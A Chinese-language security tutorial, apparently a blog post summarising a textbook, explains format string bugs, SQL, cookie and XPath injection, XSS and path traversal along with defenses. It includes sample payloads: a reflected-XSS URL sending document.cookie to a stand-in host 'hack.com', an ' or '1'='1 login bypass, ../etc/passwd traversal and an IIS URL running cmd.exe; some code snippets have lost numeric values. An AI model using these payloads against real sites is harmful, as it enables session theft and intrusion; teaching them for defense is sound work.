Format String 格式化串漏洞

考虑如下的代码:

 #include<stdio.h>
int main()
{
int a=44,b=77;
printf("a=%d, b=%d\n",a,b);
printf("a=%d, b=%d\n");
return 0;
}

第 6 行的 printf() 没有正确设置参数,而 C 对此没做强制检查。第 6 行的输出结果在 XP sp2 VM(VC6.0 Release 版本)上的结果为 a=4218928, b=44。其中 a 的值是第 5 行的参数 "a=%d, b=%d\n" 的地址,b 的值是第 5 行中压入的 a 的值(从右向左将参数压栈,printf 执行后其参数不会出栈)。

如上的代码只是个小 bug,但对于以下的例子,就构成严重的漏洞了(比如输入"%p, %p, %p, ...",%p 含义为 pointer):

 #include<stdio.h>

 int main(int argc, char **argv)
{
//printf(argv[1]);
char buf[];
printf(gets(buf));
return ;
}

如果配合能够写的控制符,这种漏洞会更危险,例如:

 #include<stdio.h>
int main(int argc,char **argv)
{
int len=;
printf("before write: len=%d\n",len);
printf("failwest:%d%n\n",len,&len); // %n 控制符会将当前 printf 的总输出长度写回对应的变量,这里 “failwest:123” 长度为 12
printf("after write: len=%d\n",len);
return ;
}

输出结果为:

before write: len=
failwest:
after write: len=

当输入输出函数的格式化控制符能够被外界影响时,攻击者可以综合利用前面介绍的读内存和写内存的方法修改函数返回地址,劫持进程,运行 shellcode。

比起大量使用命令和脚本的 *NIX 系统,Windows 中命令解析和文本解析的操作不是很多,加上这种类型的漏洞发生的条件很苛刻,使得格式化串漏洞的实际安全非常罕见。

堆栈溢出漏洞往往被复杂的程序逻辑所掩盖,给漏洞检测造成一定困难。相对而言,格式化串漏洞的起因非常简单,只要检测相关函数的配置就行,通过简单的静态代码扫描,一般可以容易地发现这类漏洞(VS2005 中在编译级别对参数做了检查,且默认情况下关闭了对 "%n" 控制符的使用)。通常能引起这种漏洞的函数包括:

printf()
wprintf()
fprintf()
fwprintf()
sprintf()
swprintf()
vprintf()
vwprintf()
vfprintf()
vfwprintf()
vsprintf()
vswprintf()

SQL 注入

网站系统的可输入接口比软件系统要多得多,脚本语言在提供了高度灵活性的同时也带有语言限制不够严格的缺点,这使得 Web 系统的安全性变得非常严峻。

SQL 注入源于 ASP、PHP 等脚本语言对用户输入数据和解析时的缺陷。不像缓冲区溢出攻击那样需要掌握大量的系统底层知识,SQL 注入的技术门槛相对较低,只要懂得基本的 Web 技术和数据库知识,就能够实施攻击。一些自动化攻击工具如 NBSI2 等也使得这类攻击变得更容易。目前这类攻击技术已经发展成一套比较完善的体系并成为网站攻击的主流技术。

SQL 注入的精髓在于构造巧妙的注入命令串,从服务器的不同反馈结果中逐步分析出数据库中各个表项之间的关系,直到彻底攻破数据库。遇到功能强大的数据库(如 MS SQL Server)时,如果数据库权限配置不合理,利用存储过程甚至可以做到远程控制服务器。

防范注入攻击的手段有:

. 对用户输入数据进行限制,过滤掉第三字符。
. 产生注入的根源是拼接字符串,故可以不用拼接字符串进行查询而采用参数化查询。

针对 SQL 注入的更深的内容可以去原书《0day 安全:软件漏洞分析技术(第2版)》第 8.1-8.2 节查阅。

Cookie 注入

以 ASP 为例,程序员经常会使用以下两种方式获取用户提交的数据:

ID = Request.QueryString("id")  // GET
ID = Request.Form("id") // POST

许多程序员为了同时支持 GET 和 POST 方式,常常使用如下通用方式:

ID = Request("id")

而实际上,这种方式会先读取 GET 中的数据,然后读取 POST 中的数据,如果还没找到相应数据,则读取 Cookie 中的数据。如果对注入的防范仅落实在 GET 和 POST 方式上,这时攻击者就能通过 Cookie 绕过限制进行注入攻击,Cookie 注入由此产生!

相关 Cookie 注入方式和简单技巧原书可查!

XML 的路径语言:XPath 注入

XPath 是 XML 的路径语言,通过“引用数据”的方式从 XML 文档中读取各种信息,并且具有很好的松散输入特性和容错特性。这种特性使得攻击者能够在 URL、表单或其他地方附上精心构造的 XPath 查询语句来获得权限。

如果存放用户验证信息的不是一个数据库表,而是一个如下的 XML 文件:

 <?xml version="1.0" encoding="UTF-8"?>
<users>
<admin>
<name>admin</name>
<password>123</password>
</admin>
</users>

则对应的查询语言可能是:

//users/admin[name/text()='admin' and password/text()='123']

如果在用户名和密码框中都输入 ' or '1'='1,XPath 语句将变为:

//users/admin[name/text()='' or '1'='1' and password/text()='' or '1'='1']

括号内部的谓词结果是 True,所以查询结果将选择所有 admin 用户,验证就被绕过!

XPath 注入与 SQL 注入十分相似。数据库注入可以采用参数化查询来防止,但 XPath 不支持参数化查询,但可以采用 XQuery 来模拟参数化查询。

XSS 攻击

XSS 是 Cross Site Script 的缩写(为了不与 CSS - Cascading Style Sheets 冲突),XSS 占漏洞的比例很大,防不胜防。

很多 Web 应用中,服务器都会将用户的输入或请求的数据直接地或者经过简单加工后以页面的形式返回给客户端。在搜索引擎、错误提示页面、论坛空间等应用中,如果服务端对用户的输入没有很好地过滤,攻击者就能利用这些可信的网站,使用户的浏览器执行一些恶意的脚本。XSS 漏洞正是产生于 Web 服务器把用户的输入数据直接返回给客户端。这种攻击利用服务器作为桥梁去攻击普通用户,“跨站脚本”中的“站”正是指被利用的 Web 服务器。随着 XSS 蠕虫的出现,XSS 对服务器的攻击也逐渐得到重视。

XSS 攻击的目标一般是客户端浏览器,受影响的范围要远远大于攻击服务器的 SQL 注入等方式;另外,独立的 XSS 漏洞配合上其他攻击技术往往能产生非常严重的后果。

XSS Reflection 攻击场景
1. 用户正常登录一个网站 test.com,一个 Cookie 被设置:Set-Cookie:sessID=xxxx
2. 攻击者给用户发一个载有 XSS 的 URL,骗取用户点击
http://test.com/t.php?input=<script>var+i=new+Image;+i.src="http://hack.com/"%2bdocument.cookie;</script>
3. 用户点击如上链接,向服务器发送 URL 请求
4. 存在漏洞的 test.com 简单地把 XSS 当做网页文本返回给用户客户端
5. 用户收到返回的页面后,执行其中的攻击脚本:
var i=new Image; i.src="http://hack.com/"+document.cookie;
6. 攻击者从 hack.com 中得到 test.com 中的用户 Session ID,伪装成用户登录 test.com,完成 Session Hi-Jacking 攻击 注意:hack.com 无法从用户的浏览器中直接读取 test.com 的 Cookie 而 test.com 可以;用户信任 test.com 而不信任 hack.com,直接发送 hack.com 容易失败。

XSS Reflection 常发生于搜索引擎、错误提示页面等对用户输入的直接反馈中。如果论坛或者 Blog 对用户提交的请求没有很好地过滤,将导致 Stored XSS 漏洞:

XSS Stored 案例:XSS 蠕虫
2005 年,名为 Samy 的 MySpace 用户在自己的个人资料中加入了一些 JavaScript,所有打开该页面的浏览器都执行了这个脚本:首先把攻击者加为好友,并将这段 XSS 复制到被攻击者的个人资料中。结果 MySpace 上引发了一块大规模的基于 XSS 漏洞的蠕虫传播,一小时内 Samy 的好友超过一百万,MySpace 为了清除所有被感染的用户文档中的 XSS 而被迫停止运行,Samy 被判对 MySpace 进行经济赔偿外加三个月义工。

需要注意的是,除了上述两各类型的 XSS 漏洞,本地的 html、chm、mht、dll、exe 等文件内部也可以存储 XSS,从而引起 XSS 攻击。

将文本返回给用户浏览器之前,对敏感字符进行编码替换是一个防御 XSS 攻击的简单有效的办法,几个可以考虑的替换如下:
" → &#34
'  → &#39
& → &#38
......

路径遍历漏洞

Windows 系统中 ../ 和 ..\ 都能表示上一级目录,*NIX 中 ../ 也能表示上一级目录:

C:\Windows\../Windows\win.ini
/var/www/html/../../../etc/passwd
%2e%2e%2f 含义为 ../

如果开发者没有对这种路径回溯进行过滤或者权限控制的话,攻击者就可以通过精心构造的回溯路径获取服务器上的敏感文件,从而进一步渗透。

工业界最著名的路径遍历漏洞是 CVE-2001-0333 IIS5 中的漏洞:攻击者使用 Unicode 编码过的 URL 可以突破 IIS 的目录访问控制机制,例如:(%cp%af 是 Unicode 的 '/')

http://xxxx.com/..%c0%af../winnt/system32/cmd.exe+/c+dir+c:\

将会返回 dir c:\ 的结果。

同样一个资源的表达方式是多种多样的,在给用户带来方便的同时,也使得访问控制系统变得复杂。如果需要设计一个防火墙系统对一个特定的 URL 黑名单进行阻止,就要考虑到 URL 形态上的多样性,否则简单编码就可以绕过防火墙规则。

http://www.baidu.com
http://220.181.6.175
http://0xDCB506AF // IP 的 HEX 形式
http://3702851247 // DEC 表示形式
http://0334.0265.06.0257 // OCT 表示形式
http://0x123456789DCB506AF // IE 等浏览器会将多余的数字丢弃
2001:0DB8:0000:0000:0000:0000:1428:57AB
2001:0DB8:0000:0000:0000::1428:57AB
2001:0DB8:0:0:0:0:1428:57AB
2001:0DB8:0::0::1428:57AB
2001:0DB8::1428:57AB

而范式化(Canonicalization)可以较好地解决这个问题。Windows 中的 GetFullPathName() 或者 PathCanonicalize() 、Linux 中的 canonicalize_file_name()、Java 中的 File.getCanonicalPath() 和 java.net.URI.normalize()、PHP 中的 realpath() 都可以做到这一点。

OD: Format String, SQL Injection, XSS的更多相关文章

  1. SQL injection

    SQL injection is a code injection technique, used to attack data-driven applications, in which malic ...

  2. 网络攻击技术开篇——SQL Injection

    本文转自: http://www.cnblogs.com/rush/archive/2011/12/31/2309203.html 1.1.1 摘要 日前,国内最大的程序员社区CSDN网站的用户数据库 ...

  3. 网络攻击技术:SQL Injection(sql注入)

    网络攻击技术开篇——SQL Injection   1.1.1 摘要 日前,国内最大的程序员社区CSDN网站的用户数据库被黑客公开发布,600万用户的登录名及密码被公开泄露,随后又有多家网站的用户密码 ...

  4. ref:Manual SQL injection discovery tips

    ref:https://gerbenjavado.com/manual-sql-injection-discovery-tips/ Manual SQL injection discovery tip ...

  5. ecshop /search.php SQL Injection Vul

    catalog . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 ECSHOP商城系统Search.php页面过滤不严导致SQL注入漏洞 ...

  6. How to prevent SQL injection attacks?

    In our earlier tutorial on SQL Injection, one way to have prevented the SQL injection attack was by ...

  7. (转载)总结一下SQL语句中引号(')、quotedstr()、('')、format()在SQL语句中的用法

    总结一下SQL语句中引号(').quotedstr().('').format()在SQL语句中的用法 总结一下SQL语句中引号(').quotedstr().('').format()在SQL语句中 ...

  8. 总结一下SQL语句中引号(')、quotedstr()、('')、format()在SQL语句中的用法

    总结一下SQL语句中引号(').quotedstr().('').format()在SQL语句中的用法 日期:2005年6月1日 作者:seasky212 总结一下SQL语句中引号(').quoted ...

  9. Python TypeError: not enough arguments for format string

    今天使用mysqldb执行query语句的时候,在执行这条语句的时候: select PROJ, DATE_FORMAT(MAX(DATE),'%Y-%m-%') AS MAXDATE, DATE_F ...

随机推荐

  1. RBAC角色权限控制

    RBAC角色权限控制 1. user (用户表) *  用户的基本信息(mid:用户信息id  如图) 2. node (节点表) * 页面(模块\控制器\方法) 3. role_node(角色.节点 ...

  2. C/C++默认浮点型

    代码: #include <iostream> #include <cstdio> using namespace std; void test(int a){ cout< ...

  3. Ubuntu下MySQL配置为外网访问

    Ububtu安装MySQL后默认外网无法连接,但是很多时候我们想要在外网访问方便管理.在这里,简单叙述一下自己在配置过程中的操作,步骤如下: 以root身份登入mysql mysql -u root ...

  4. JavaScript:Object.prototype.toString方法的原理

    在JavaScript中,想要判断某个对象值属于哪种内置类型,最靠谱的做法就是通过Object.prototype.toString方法. var arr = []; console.log(Obje ...

  5. innerHTML在IE中报错

      问题:开发过程中,用到循环往table里面插入tr标签,然后tr里又循环插入td,在其它浏览器都没问题,但是在IE9及以下版本中都报错:   google上得到答案:由于我之前不知道错误的原因,在 ...

  6. em px 简单换算

    大部分的网页设计者在CSS代码编写中总是先对整体定义字体尺寸,中文情况下一般为12px,而其实这样以来在通过IE顶部菜单中的“察看-文字大小”设置已无任何 作用.对字体感觉太小的浏览者而言无疑是种很不 ...

  7. php的header()函数前有echo输出情况分析

    php的header()方法一般被用来告知浏览器做一些什么样的操作,比如跳转,刷新等等:而调用header方法前,如果使用echo输出一些内容,会发生什么情况呢?会对header函数有影响吗?我们实验 ...

  8. 操作css样式

    <script type="text/javascript"> //产生一个四位的验证码. function createCode(){ var datas = ['A ...

  9. sudo gedit xx warning

    When I sue command "sudo gedit xx", it appeas several warning: gedit:): IBUS-WARNING **: T ...

  10. 转:fopen()函数

    1.2 文件的输入输出函数 键盘.显示器.打印机.磁盘驱动器等逻辑设备, 其输入输出都可以通过文件管理的方法来完成.而在编程时使用最多的要算是磁盘文件, 因此本节主要以磁盘文件为主, 详细介绍Turb ...